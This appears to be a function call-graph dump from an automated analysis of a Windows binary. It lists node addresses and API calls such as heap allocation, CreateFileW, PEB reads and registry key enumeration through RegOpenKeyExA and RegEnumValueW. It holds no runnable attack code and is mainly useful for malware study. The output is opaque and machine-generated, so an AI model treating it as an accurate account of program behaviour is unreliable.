14991->14977 14993 18b4f1 std::_Throw_future_error 14992->14993 14994 1a8a8f __fassign 2 API calls 14993->14994 14996 18b558 __fassign __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 14993->14996 14995 18b59f 14994->14995 14996->14963 14998 1721e0 std::future_error::future_error RtlAllocateHeap 14997->14998 14999 18bc9f 14998->14999 14999->14942 13040 1a6bcb 13047 1a6bd7 __fassign 13040->13047 13042 1a6c06 13043 1a6c23 13042->13043 13044 1a6c15 13042->13044 13060 1a689d 13043->13060 13045 1a6c79 8 API calls 13044->13045 13048 1a6c1f 13045->13048 13054 1a8a8f 13047->13054 13049 1a6c3d 13063 1a67fd 13049->13063 13053 1a6c51 ___free_lconv_mon 13055 1a8a94 __fassign 13054->13055 13058 1a8a9f ___std_exception_copy 13055->13058 13078 1ad4d4 13055->13078 13075 1a64fd 13058->13075 13059 1a8ad2 __dosmaperr __fassign 13059->13042 13095 1a681a 13060->13095 13062 1a68af 13062->13049 13131 1a674b 13063->13131 13065 1a6815 13065->13053 13066 1a6c79 13065->13066 13067 1a6ca4 __cftof 13066->13067 13073 1a6c87 __dosmaperr ___std_exception_copy 13066->13073 13068 1a6ce6 CreateFileW 13067->13068 13074 1a6cca __cftof __dosmaperr ___std_exception_copy 13067->13074 13069 1a6d0a 13068->13069 13070 1a6d18 13068->13070 13149 1a6de1 GetFileType 13069->13149 13161 1a6d57 13070->13161 13073->13053 13074->13053 13083 1a63d7 13075->13083 13080 1ad4e0 __fassign 13078->13080 13079 1ad53c __dosmaperr __fassign ___std_exception_copy 13079->13058 13080->13079 13081 1a64fd __fassign 2 API calls 13080->13081 13082 1ad6ce __dosmaperr __fassign 13081->13082 13082->13058 13084 1a63e5 __fassign 13083->13084 13085 1a6430 13084->13085 13088 1a643b 13084->13088 13085->13059 13093 1aa1a2 GetPEB 13088->13093 13090 1a6445 13091 1a644a GetPEB 13090->13091 13092 1a645a __fassign 13090->13092 13091->13092 13094 1aa1bc __fassign 13093->13094 13094->13090 13096 1a683a 13095->13096 13100 1a6831 13095->13100 13096->13100 13101 1ab49b 13096->13101 13100->13062 13102 1ab4ae 13101->13102 13103 1a6870 13101->13103 13102->13103 13109 1af44b 13102->13109 13105 1ab4c8 13103->13105 13106 1ab4db 13105->13106 13108 1ab4f0 13105->13108 13106->13108 13114 1ae551 13106->13114 13108->13100 13111 1af457 __fassign 13109->13111 13110 1af4a6 13110->13103 13111->13110 13112 1a8a8f __fassign 2 API calls 13111->13112 13113 1af4cb 13112->13113 13115 1ae55b 13114->13115 13118 1ae469 13115->13118 13117 1ae561 13117->13108 13119 1ae475 __fassign ___free_lconv_mon 13118->13119 13120 1a8a8f __fassign 2 API calls 13119->13120 13121 1ae496 13119->13121 13122 1ae508 13120->13122 13121->13117 13123 1ae544 13122->13123 13127 1aa5ce 13122->13127 13123->13117 13128 1aa5f1 13127->13128 13129 1a8a8f __fassign 2 API calls 13128->13129 13130 1aa667 13129->13130 13132 1a6773 13131->13132 13137 1a6759 __dosmaperr __fassign 13131->13137 13133 1a677a 13132->13133 13134 1a6799 __fassign 13132->13134 13133->13137 13138 1a68f6 13133->13138 13136 1a68f6 RtlAllocateHeap 13134->13136 13134->13137 13136->13137 13137->13065 13139 1a6904 13138->13139 13142 1a6935 13139->13142 13145 1aaeeb 13142->13145 13144 1a6915 13144->13137 13147 1aaf27 __dosmaperr 13145->13147 13148 1aaef9 __fassign 13145->13148 13146 1aaf14 RtlAllocateHeap 13146->13147 13146->13148 13147->13144 13148->13146 13148->13147 13150 1a6e1c __cftof 13149->13150 13160 1a6eb2 __dosmaperr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13149->13160 13151 1a6e55 GetFileInformationByHandle 13150->13151 13150->13160 13152 1a6e6b 13151->13152 13151->13160 13167 1a70a9 13152->13167 13156 1a6e88 13157 1a6f51 SystemTimeToTzSpecificLocalTime 13156->13157 13158 1a6e9b 13157->13158 13159 1a6f51 SystemTimeToTzSpecificLocalTime 13158->13159 13159->13160 13160->13074 13192 1a72f4 13161->13192 13163 1a6d65 13164 1a6d6a __dosmaperr 13163->13164 13165 1a70a9 3 API calls 13163->13165 13164->13074 13166 1a6d83 13165->13166 13166->13074 13169 1a70bf _wcsrchr 13167->13169 13168 1a6e77 13177 1a6f51 13168->13177 13169->13168 13181 1ab9c4 13169->13181 13171 1a7103 13171->13168 13172 1ab9c4 3 API calls 13171->13172 13173 1a7114 13172->13173 13173->13168 13174 1ab9c4 3 API calls 13173->13174 13175 1a7125 13174->13175 13175->13168 13176 1ab9c4 3 API calls 13175->13176 13176->13168 13178 1a6f69 13177->13178 13179 1a6f89 SystemTimeToTzSpecificLocalTime 13178->13179 13180 1a6f6f __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13178->13180 13179->13180 13180->13156 13182 1ab9d2 13181->13182 13185 1ab9d8 __dosmaperr ___std_exception_copy 13182->13185 13186 1aba0d 13182->13186 13184 1aba08 13184->13171 13185->13171 13187 1aba37 13186->13187 13190 1aba1d __dosmaperr ___std_exception_copy 13186->13190 13188 1a681a __fassign 3 API calls 13187->13188 13187->13190 13191 1aba61 13188->13191 13189 1ab985 GetPEB GetPEB RtlAllocateHeap 13189->13191 13190->13184 13191->13189 13191->13190 13193 1a7318 13192->13193 13195 1a731e __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ ___std_exception_copy 13193->13195 13196 1a7016 13193->13196 13195->13163 13197 1a7022 __dosmaperr 13196->13197 13202 1ab85b 13197->13202 13199 1a7048 13199->13195 13200 1a703a __dosmaperr 13200->13199 13201 1ab85b RtlAllocateHeap 13200->13201 13201->13199 13205 1ab6be 13202->13205 13204 1ab874 13204->13200 13206 1ab73a 13205->13206 13207 1ab6ce 13205->13207 13222 1b1ed8 13206->13222 13207->13206 13208 1ab6d5 13207->13208 13213 1ab6e2 ___std_exception_copy 13208->13213 13214 1ab655 13208->13214 13211 1ab71b 13218 1ab7f5 13211->13218 13213->13204 13215 1ab670 13214->13215 13217 1ab675 __dosmaperr 13215->13217 13225 1ab797 13215->13225 13217->13211 13219 1ab802 13218->13219 13221 1ab81b __fassign 13218->13221 13220 1a8a84 ___std_exception_copy RtlAllocateHeap 13219->13220 13219->13221 13220->13221 13221->13213 13236 1b1d02 13222->13236 13224 1b1eef 13224->13213 13226 1ab7a5 13225->13226 13229 1ab7d6 13226->13229 13232 1a8a84 13229->13232 13231 1ab7b6 13231->13217 13235 1aaeeb __fassign 13232->13235 13233 1aaf14 RtlAllocateHeap 13234 1aaf27 __dosmaperr 13233->13234 13233->13235 13234->13231 13235->13233 13235->13234 13237 1b1d34 13236->13237 13243 1b1d20 __dosmaperr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ ___std_exception_copy 13236->13243 13238 1ab797 RtlAllocateHeap 13237->13238 13237->13243 13239 1b1dc9 13238->13239 13240 1ab655 RtlAllocateHeap 13239->13240 13241 1b1dd6 13240->13241 13242 1ab7f5 RtlAllocateHeap 13241->13242 13241->13243 13242->13243 13243->13224 13928 18b82e 13933 18b6b5 13928->13933 13930 18b856 13941 18b618 13930->13941 13932 18b86f 13934 18b6c1 Concurrency::details::_Reschedule_chore 13933->13934 13935 18b6f2 13934->13935 13951 18c5af 13934->13951 13935->13930 13939 18b6dc __Mtx_unlock 13940 172a10 9 API calls 13939->13940 13940->13935 13942 18b624 Concurrency::details::_Reschedule_chore 13941->13942 13943 18c5af GetSystemTimePreciseAsFileTime 13942->13943 13950 18b67e 13942->13950 13944 18b639 13943->13944 13945 172a10 9 API calls 13944->13945 13946 18b63f __Mtx_unlock 13945->13946 13947 172a10 9 API calls 13946->13947 13948 18b65c __Cnd_broadcast 13947->13948 13949 172a10 9 API calls 13948->13949 13948->13950 13949->13950 13950->13932 13961 18c355 13951->13961 13953 18b6d6 13954 172a10 13953->13954 13955 172a1c 13954->13955 13956 172a1a 13954->13956 13978 18c16d 13955->13978 13956->13939 13962 18c3ab 13961->13962 13964 18c37d __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13961->13964 13962->13964 13967 18ce6e 13962->13967 13964->13953 13965 18c400 __Xtime_diff_to_millis2 13965->13964 13966 18ce6e _xtime_get GetSystemTimePreciseAsFileTime 13965->13966 13966->13965 13968 18ce8a __aulldvrm 13967->13968 13969 18ce7d 13967->13969 13968->13965 13969->13968 13971 18ce47 13969->13971 13974 18caed 13971->13974 13975 18cafe GetSystemTimePreciseAsFileTime 13974->13975 13977 18cb0a 13974->13977 13975->13977 13977->13968 13979 18c195 13978->13979 13980 18c177 13978->13980 13979->13979 13980->13979 13982 18c19a 13980->13982 13987 1729e0 13982->13987 13984 18c1b1 14003 18c102 13984->14003 13986 18c1c2 std::_Throw_future_error 13986->13980 14009 18bddf 13987->14009 13989 1729ff 13989->13984 13990 1a8a8f __fassign 2 API calls 13991 1a6c06 13990->13991 13992 1a6c23 13991->13992 13993 1a6c15 13991->13993 13995 1a689d 3 API calls 13992->13995 13994 1a6c79 8 API calls 13993->13994 13997 1a6c1f 13994->13997 13998 1a6c3d 13995->13998 13996 1729f4 __fassign 13996->13989 13996->13990 13997->13984 13999 1a67fd RtlAllocateHeap 13998->13999 14000 1a6c4a 13999->14000 14001 1a6c79 8 API calls 14000->14001 14002 1a6c51 ___free_lconv_mon 14000->14002 14001->14002 14002->13984 14004 18c10e __EH_prolog3_GS 14003->14004 14005 187f00 RtlAllocateHeap 14004->14005 14006 18c140 14005->14006 14016 1725b0 14006->14016 14008 18c155 14008->13986 14012 18cb34 14009->14012 14013 18cb42 InitOnceExecuteOnce 14012->14013 14015 18bdf2 14012->14015 14013->14015 14015->13996 14017 187840 RtlAllocateHeap 14016->14017 14018 172602 14017->14018 14019 172625 14018->14019 14020 188e40 RtlAllocateHeap 14018->14020 14021 188e40 RtlAllocateHeap 14019->14021 14023 17268e shared_ptr 14019->14023 14020->14019 14021->14023 14022 1a37bc ___std_exception_copy RtlAllocateHeap 14024 17274b shared_ptr ___std_exception_destroy __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 14022->14024 14023->14022 14023->14024 14024->14008 13244 181da0 13398 187f00 13244->13398 13246 181e3b 13247 181eb8 13246->13247 13248 181e48 13246->13248 13249 187f00 RtlAllocateHeap 13247->13249 13250 187840 RtlAllocateHeap 13248->13250 13256 181ef7 shared_ptr 13249->13256 13251 181e62 13250->13251 13252 175b00 RtlAllocateHeap 13251->13252 13253 181e69 13252->13253 13254 187840 RtlAllocateHeap 13253->13254 13255 181e7f 13254->13255 13258 187840 RtlAllocateHeap 13255->13258 13257 182011 13256->13257 13259 181f8f 13256->13259 13260 182da5 13256->13260 13290 182906 shared_ptr 13256->13290 13411 187840 13257->13411 13263 181e97 13258->13263 13264 187f00 RtlAllocateHeap 13259->13264 13636 188040 13260->13636 13262 182020 13422 175b00 13262->13422 13267 187840 RtlAllocateHeap 13263->13267 13274 181fb3 shared_ptr 13264->13274 13346 181eaf 13267->13346 13268 182daa 13270 188040 RtlAllocateHeap 13268->13270 13269 18c09c std::_Xinvalid_argument RtlAllocateHeap 13271 182dd2 13269->13271 13278 182daf 13270->13278 13642 18c0dc 13271->13642 13272 187f00 RtlAllocateHeap 13272->13257 13273 187840 RtlAllocateHeap 13277 182acc 13273->13277 13274->13272 13274->13290 13276 18202b 13276->13268 13279 182082 13276->13279 13280 17e410 5 API calls 13277->13280 13639 18c09c 13278->13639 13281 187f00 RtlAllocateHeap 13279->13281 13280->13290 13283 1820a7 shared_ptr 13281->13283 13283->13278 13284 187840 RtlAllocateHeap 13283->13284 13285 182112 13284->13285 13286 175b00 RtlAllocateHeap 13285->13286 13287 18211d 13286->13287 13288 187f00 RtlAllocateHeap 13287->13288 13291 182184 shared_ptr __dosmaperr 13288->13291 13289 182d80 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13290->13269 13290->13289 13291->13278 13429 1a8959 13291->13429 13294 182244 13294->13271 13296 18238a 13294->13296 13297 18253b 13294->13297 13298 18225d 13294->13298 13299 182487 13294->13299 13344 1822b2 shared_ptr 13294->13344 13295 187840 RtlAllocateHeap 13303 182610 13295->13303 13300 187840 RtlAllocateHeap 13296->13300 13301 187840 RtlAllocateHeap 13297->13301 13304 187840 RtlAllocateHeap 13298->13304 13302 187840 RtlAllocateHeap 13299->13302 13305 1823a1 13300->13305 13306 182552 13301->13306 13307 18249e 13302->13307 13308 187840 RtlAllocateHeap 13303->13308 13309 182274 13304->13309 13311 187840 RtlAllocateHeap 13305->13311 13312 187840 RtlAllocateHeap 13306->13312 13313 187840 RtlAllocateHeap 13307->13313 13325 182622 13308->13325 13310 187840 RtlAllocateHeap 13309->13310 13314 18228c 13310->13314 13315 1823b9 13311->13315 13316 18256a 13312->13316 13317 1824b6 13313->13317 13318 187840 RtlAllocateHeap 13314->13318 13319 187840 RtlAllocateHeap 13315->13319 13320 187840 RtlAllocateHeap 13316->13320 13321 187840 RtlAllocateHeap 13317->13321 13322 1822a4 13318->13322 13333 1823d1 13319->13333 13323 182582 13320->13323 13324 1824ce 13321->13324 13606 178c40 13322->13606 13626 178dc0 13323->13626 13616 178f40 13324->13616 13329 182a53 13325->13329 13433 1a66c7 13325->13433 13331 187840 RtlAllocateHeap 13329->13331 13334 182a6d 13331->13334 13332 18265b 13335 187840 RtlAllocateHeap 13332->13335 13336 187f00 RtlAllocateHeap 13333->13336 13337 175b00 RtlAllocateHeap 13334->13337 13343 182670 shared_ptr __dosmaperr 13335->13343 13336->13344 13338 182a74 13337->13338 13339 187840 RtlAllocateHeap 13338->13339 13340 182a8a 13339->13340 13341 187840 RtlAllocateHeap 13340->13341 13342 182aa2 13341->13342 13345 187840 RtlAllocateHeap 13342->13345 13343->13290 13347 1a8959 3 API calls 13343->13347 13344->13290 13344->13295 13345->13346 13346->13273 13348 182729 13347->13348 13348->13271 13348->13290 13348->13329 13349 182751 13348->13349 13350 187840 RtlAllocateHeap 13349->13350 13351 182768 13350->13351 13352 187840 RtlAllocateHeap 13351->13352 13353 18277d 13352->13353 13354 1827a1 13353->13354 13355 1829f6 13353->13355 13357 187840 RtlAllocateHeap 13354->13357 13356 187840 RtlAllocateHeap 13355->13356 13358 182a00 13356->13358 13359 1827ab 13357->13359 13360 175b00 RtlAllocateHeap 13358->13360 13361 175b00 RtlAllocateHeap 13359->13361 13362 182a07 13360->13362 13363 1827b2 13361->13363 13364 187840 RtlAllocateHeap 13362->13364 13365 187840 RtlAllocateHeap 13363->13365 13367 182a1d 13364->13367 13366 1827c8 13365->13366 13368 187840 RtlAllocateHeap 13366->13368 13369 187840 RtlAllocateHeap 13367->13369 13370 1827e0 13368->13370 13371 182a35 13369->13371 13372 187840 RtlAllocateHeap 13370->13372 13373 187840 RtlAllocateHeap 13371->13373 13374 1827f8 13372->13374 13373->13346 13375 187840 RtlAllocateHeap 13374->13375 13376 18280a 13375->13376 13437 17e410 13376->13437 13378 182813 13378->13290 13379 187840 RtlAllocateHeap 13378->13379 13380 182874 13379->13380 13381 175b00 RtlAllocateHeap 13380->13381 13382 18287f 13381->13382 13571 188160 13382->13571 13384 182893 13575 1884e0 13384->13575 13386 1828a7 13387 188160 RtlAllocateHeap 13386->13387 13388 1828b7 13387->13388 13389 187840 RtlAllocateHeap 13388->13389 13390 1828d7 13389->13390 13579 178890 13390->13579 13392 1828de 13393 187840 RtlAllocateHeap 13392->13393 13394 1828f3 13393->13394 13395 175b00 RtlAllocateHeap 13394->13395 13396 1828fa 13395->13396 13587 175dd0 13396->13587 13400 187f1e 13398->13400 13402 187f44 13398->13402 13400->13246 13401 188033 13656 172380 13401->13656 13404 187f98 13402->13404 13405 187fbd 13402->13405 13409 187fa9 13402->13409 13404->13401 13645 18d2e8 13404->13645 13407 18d2e8 RtlAllocateHeap 13405->13407 13405->13409 13407->13409 13410 188010 shared_ptr 13409->13410 13653 189170 13409->13653 13410->13246 13412 187866 13411->13412 13413 18786d 13412->13413 13414 1878c1 13412->13414 13415 1878a2 13412->13415 13413->13262 13418 18d2e8 RtlAllocateHeap 13414->13418 13421 1878af __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 13414->13421 13416 1878f9 13415->13416 13417 1878a9 13415->13417 13419 172380 RtlAllocateHeap 13416->13419 13420 18d2e8 RtlAllocateHeap 13417->13420 13418->13421 13419->13421 13420->13421 13421->13262 13673 175830 13422->13673 13426 175b5a 13692 174ad0 13426->13692 13428 175b6b shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13428->13276 13430 1a8974 13429->13430 13718 1a86b7 13430->13718 13432 182235 13432->13278 13432->13294 13434 1a66d3 __fassign 13433->13434 13436 1a66dd __dosmaperr ___std_exception_copy 13434->13436 13744 1a6650 13434->13744 13436->13332 13438 187840 RtlAllocateHeap 13437->13438 13439 17e459 13438->13439 13440 175b00 RtlAllocateHeap 13439->13440 13441 17e464 13440->13441 13442 187840 RtlAllocateHeap 13441->13442 13443 17e47f 13442->13443 13444 175b00 RtlAllocateHeap 13443->13444 13445 17e48a 13444->13445 13767 189180 13445->13767 13447 17e49d 13448 188160 RtlAllocateHeap 13447->13448 13449 17e4df 13448->13449 13772 188060 13449->13772 13451 17e4f0 13452 188160 RtlAllocateHeap 13451->13452 13453 17e501 13452->13453 13454 187840 RtlAllocateHeap 13453->13454 13455 17e6ae 13454->13455 13456 187840 RtlAllocateHeap 13455->13456 13457 17e6c3 13456->13457 13458 187840 RtlAllocateHeap 13457->13458 13459 17e6d5 13458->13459 13780 17bd30 13459->13780 13461 17e6e1 13462 187840 RtlAllocateHeap 13461->13462 13463 17e6f6 13462->13463 13464 187840 RtlAllocateHeap 13463->13464 13465 17e70e 13464->13465 13466 175b00 RtlAllocateHeap 13465->13466 13467 17e715 13466->13467 13802 178490 13467->13802 13469 17e979 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13469->13378 13470 17e721 13470->13469 13471 187840 RtlAllocateHeap 13470->13471 13472 17e9f9 13471->13472 13473 175b00 RtlAllocateHeap 13472->13473 13474 17ea01 13473->13474 13808 188200 13474->13808 13476 17ea16 13477 188060 RtlAllocateHeap 13476->13477 13478 17ea25 13477->13478 13479 187840 RtlAllocateHeap 13478->13479 13480 17ec40 13479->13480 13481 175b00 RtlAllocateHeap 13480->13481 13482 17ec48 13481->13482 13483 188200 RtlAllocateHeap 13482->13483 13484 17ec5d 13483->13484 13485 188060 RtlAllocateHeap 13484->13485 13488 17ec6c 13485->13488 13486 17f579 shared_ptr 13486->13378 13487 187f00 RtlAllocateHeap 13487->13488 13488->13486 13488->13487 13489 17f5ab 13488->13489 13490 187840 RtlAllocateHeap 13489->13490 13491 17f607 13490->13491 13492 175b00 RtlAllocateHeap 13491->13492 13493 17f60e 13492->13493 13494 187840 RtlAllocateHeap 13493->13494 13495 17f621 13494->13495 13496 187840 RtlAllocateHeap 13495->13496 13497 17f636 13496->13497 13498 187840 RtlAllocateHeap 13497->13498 13499 17f64b 13498->13499 13500 187840 RtlAllocateHeap 13499->13500 13501 17f65d 13500->13501 13502 17e410 5 API calls 13501->13502 13503 17f666 13502->13503 13504 187f00 RtlAllocateHeap 13503->13504 13505 17f68a 13504->13505 13506 187840 RtlAllocateHeap 13505->13506 13507 17f69a 13506->13507 13508 187f00 RtlAllocateHeap 13507->13508 13509 17f6b7 13508->13509 13510 187f00 RtlAllocateHeap 13509->13510 13512 17f6d0 13510->13512 13511 17f862 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13511->13378 13512->13511 13513 187840 RtlAllocateHeap 13512->13513 13514 17f8e4 13513->13514 13515 175b00 RtlAllocateHeap 13514->13515 13516 17f8eb 13515->13516 13517 187840 RtlAllocateHeap 13516->13517 13518 17f8fe 13517->13518 13519 187840 RtlAllocateHeap 13518->13519 13520 17f913 13519->13520 13521 187840 RtlAllocateHeap 13520->13521 13522 17f928 13521->13522 13523 187840 RtlAllocateHeap 13522->13523 13524 17f93a 13523->13524 13525 17e410 5 API calls 13524->13525 13527 17f943 13525->13527 13526 17fa15 shared_ptr 13526->13378 13527->13526 13528 187840 RtlAllocateHeap 13527->13528 13529 17fa85 13528->13529 13816 179490 13529->13816 13531 17fa94 13831 179140 13531->13831 13533 17faa3 13534 188160 RtlAllocateHeap 13533->13534 13535 17fabb 13534->13535 13535->13535 13536 187f00 RtlAllocateHeap 13535->13536 13537 17fb6c 13536->13537 13538 187840 RtlAllocateHeap 13537->13538 13539 17fb87 13538->13539 13540 187840 RtlAllocateHeap 13539->13540 13541 17fb99 13540->13541 13542 187840 RtlAllocateHeap 13541->13542 13543 1804b4 13542->13543 13544 175b00 RtlAllocateHeap 13543->13544 13545 1804bb 13544->13545 13546 187840 RtlAllocateHeap 13545->13546 13547 1804d1 13546->13547 13548 187840 RtlAllocateHeap 13547->13548 13549 1804e9 13548->13549 13550 187840 RtlAllocateHeap 13549->13550 13551 180501 13550->13551 13552 187840 RtlAllocateHeap 13551->13552 13553 180513 13552->13553 13554 17e410 5 API calls 13553->13554 13555 18051c 13554->13555 13556 180760 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13555->13556 13557 187840 RtlAllocateHeap 13555->13557 13556->13378 13558 180867 13557->13558 13559 175b00 RtlAllocateHeap 13558->13559 13560 18086e 13559->13560 13561 187840 RtlAllocateHeap 13560->13561 13562 180884 13561->13562 13563 187840 RtlAllocateHeap 13562->13563 13564 18089c 13563->13564 13565 187840 RtlAllocateHeap 13564->13565 13566 1808b4 13565->13566 13567 187840 RtlAllocateHeap 13566->13567 13568 1811c0 13567->13568 13569 17e410 5 API calls 13568->13569 13570 1811c9 13569->13570 13572 188179 13571->13572 13573 188e40 RtlAllocateHeap 13572->13573 13574 18818d 13572->13574 13573->13574 13574->13384 13576 1884f6 13575->13576 13576->13576 13577 18850b 13576->13577 13578 188e40 RtlAllocateHeap 13576->13578 13577->13386 13578->13577 13585 1789fa 13579->13585 13586 1788e8 shared_ptr 13579->13586 13580 187840 RtlAllocateHeap 13580->13586 13581 175b00 RtlAllocateHeap 13581->13586 13582 178a30 13584 188040 RtlAllocateHeap 13582->13584 13583 187f00 RtlAllocateHeap 13583->13586 13584->13585 13585->13392 13586->13580 13586->13581 13586->13582 13586->13583 13586->13585 13589 175e08 13587->13589 13588 175eee shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13588->13290 13589->13588 13590 187f00 RtlAllocateHeap 13589->13590 13591 175f79 13590->13591 13592 187f00 RtlAllocateHeap 13591->13592 13593 175fad 13592->13593 13594 187f00 RtlAllocateHeap 13593->13594 13595 175fde 13594->13595 13596 187f00 RtlAllocateHeap 13595->13596 13597 17600f 13596->13597 13598 187f00 RtlAllocateHeap 13597->13598 13599 176040 RegOpenKeyExA 13598->13599 13600 17643a shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13599->13600 13605 176093 __cftof 13599->13605 13600->13290 13601 176133 RegEnumValueW 13601->13605 13604 187840 RtlAllocateHeap 13604->13605 13605->13600 13605->13601 13605->13604 13888 187c20 13605->13888 13901 188350 13605->13901 13607 178c8f 13606->13607 13608 187840 RtlAllocateHeap 13607->13608 13609 178c9f 13608->13609 13610 175b00 RtlAllocateHeap 13609->13610 13611 178caa 13610->13611 13612 187f00 RtlAllocateHeap 13611->13612 13613 178cfc 13612->13613 13614 188060 RtlAllocateHeap 13613->13614 13615 178d0e shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13614->13615 13615->13344 13617 178f8f 13616->13617 13618 187840 RtlAllocateHeap 13617->13618 13619 178f9f 13618->13619 13620 175b00 RtlAllocateHeap 13619->13620 13621 178faa 13620->13621 13622 187f00 RtlAllocateHeap 13621->13622 13623 178ffc 13622->13623 13624 188060 RtlAllocateHeap 13623->13624 13625 17900e shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13624->13625 13625->13344 13627 178e10 13626->13627 13628 187840 RtlAllocateHeap 13627->13628 13629 178e1f 13628->13629 13630 175b00 RtlAllocateHeap 13629->13630 13631 178e2a 13630->13631 13632 187f00 RtlAllocateHeap 13631->13632 13633 178e7c 13632->13633 13634 188060 RtlAllocateHeap 13633->13634 13635 178e8e shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13634->13635 13635->13344 13637 18c0dc RtlAllocateHeap 13636->13637 13638 18804a 13637->13638 13638->13268 13918 18bfec 13639->13918 13641 18c0ad std::_Throw_future_error 13921 18c060 13642->13921 13644 18c0ed std::_Throw_future_error 13647 18d2ed __fassign 13645->13647 13646 1a8a84 ___std_exception_copy RtlAllocateHeap 13646->13647 13647->13646 13648 18d307 13647->13648 13649 172380 std::_Throw_future_error 13647->13649 13648->13409 13652 18d313 std::_Throw_future_error 13649->13652 13660 1a37bc 13649->13660 13651 1723c3 13651->13409 13652->13409 13664 18c0bc 13653->13664 13657 17238e std::_Throw_future_error 13656->13657 13658 1a37bc ___std_exception_copy RtlAllocateHeap 13657->13658 13659 1723c3 13658->13659 13661 1a37e6 ___std_exception_copy 13660->13661 13662 1a37c9 13660->13662 13661->13651 13662->13661 13663 1a8a84 ___std_exception_copy RtlAllocateHeap 13662->13663 13663->13661 13667 18c026 13664->13667 13666 18c0cd std::_Throw_future_error 13670 1721e0 13667->13670 13669 18c038 13669->13666 13671 1a37bc ___std_exception_copy RtlAllocateHeap 13670->13671 13672 172217 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13671->13672 13672->13669 13699 187dc0 13673->13699 13675 17585b 13676 1758d0 13675->13676 13677 187dc0 RtlAllocateHeap 13676->13677 13690 175935 13677->13690 13678 187840 RtlAllocateHeap 13678->13690 13679 175af9 13681 188040 RtlAllocateHeap 13679->13681 13680 175acd __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13680->13426 13683 175afe 13681->13683 13682 187f00 RtlAllocateHeap 13682->13690 13684 175830 RtlAllocateHeap 13683->13684 13686 175b44 13684->13686 13687 1758d0 RtlAllocateHeap 13686->13687 13688 175b5a 13687->13688 13689 174ad0 RtlAllocateHeap 13688->13689 13691 175b6b shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13689->13691 13690->13678 13690->13679 13690->13680 13690->13682 13712 175620 13690->13712 13691->13426 13693 174b04 13692->13693 13694 174b2e 13692->13694 13695 187f00 RtlAllocateHeap 13693->13695 13697 187dc0 RtlAllocateHeap 13694->13697 13696 174b1b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13695->13696 13696->13428 13698 174b8b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13697->13698 13698->13428 13701 187dde __cftof 13699->13701 13703 187e07 13699->13703 13700 189170 RtlAllocateHeap 13702 187ef8 13700->13702 13701->13675 13706 172380 RtlAllocateHeap 13702->13706 13704 187e5b 13703->13704 13705 187e7e 13703->13705 13710 187e6c __cftof 13703->13710 13704->13702 13708 18d2e8 RtlAllocateHeap 13704->13708 13709 18d2e8 RtlAllocateHeap 13705->13709 13705->13710 13707 187efd 13706->13707 13708->13710 13709->13710 13710->13700 13711 187ed5 shared_ptr 13710->13711 13711->13675 13713 175689 shared_ptr 13712->13713 13717 175750 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13712->13717 13714 17581a 13713->13714 13715 187f00 RtlAllocateHeap 13713->13715 13713->13717 13716 188040 RtlAllocateHeap 13714->13716 13715->13713 13716->13717 13717->13690 13719 1a86c9 13718->13719 13720 1a681a __fassign 3 API calls 13719->13720 13723 1a86de __dosmaperr ___std_exception_copy 13719->13723 13722 1a870e 13720->13722 13722->13723 13724 1a8905 13722->13724 13723->13432 13725 1a8942 13724->13725 13726 1a8912 13724->13726 13735 1ad2c9 13725->13735 13729 1a8921 __fassign 13726->13729 13730 1ad2ed 13726->13730 13729->13722 13731 1a681a __fassign 3 API calls 13730->13731 13732 1ad30a 13731->13732 13734 1ad31a __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13732->13734 13739 1af05f 13732->13739 13734->13729 13736 1ad2d4 13735->13736 13737 1ab49b __fassign 2 API calls 13736->13737 13738 1ad2e4 13737->13738 13738->13729 13740 1a681a __fassign 3 API calls 13739->13740 13741 1af07f __fassign 13740->13741 13742 1af0d2 __cftof __fassign __freea __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13741->13742 13743 1aaeeb __fassign RtlAllocateHeap 13741->13743 13742->13734 13743->13742 13745 1a6672 13744->13745 13747 1a665d __dosmaperr ___std_exception_copy ___free_lconv_mon 13744->13747 13745->13747 13748 1a9ed9 13745->13748 13747->13436 13749 1a9f16 13748->13749 13750 1a9ef1 13748->13750 13749->13747 13750->13749 13752 1b02d8 13750->13752 13754 1b02e4 __fassign 13752->13754 13753 1b02ec __dosmaperr ___std_exception_copy 13753->13749 13754->13753 13756 1b03ca 13754->13756 13757 1b03ec 13756->13757 13759 1b03f0 __dosmaperr ___std_exception_copy 13756->13759 13757->13759 13760 1afb5f 13757->13760 13759->13753 13761 1afbac 13760->13761 13762 1a681a __fassign 3 API calls 13761->13762 13766 1afbbb __cftof 13762->13766 13763 1ad2c9 2 API calls 13763->13766 13764 1afe5b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13764->13759 13765 1ac4ca GetPEB GetPEB RtlAllocateHeap __fassign 13765->13766 13766->13763 13766->13764 13766->13765 13766->13766 13768 189194 13767->13768 13771 1891a5 13768->13771 13846 1893e0 13768->13846 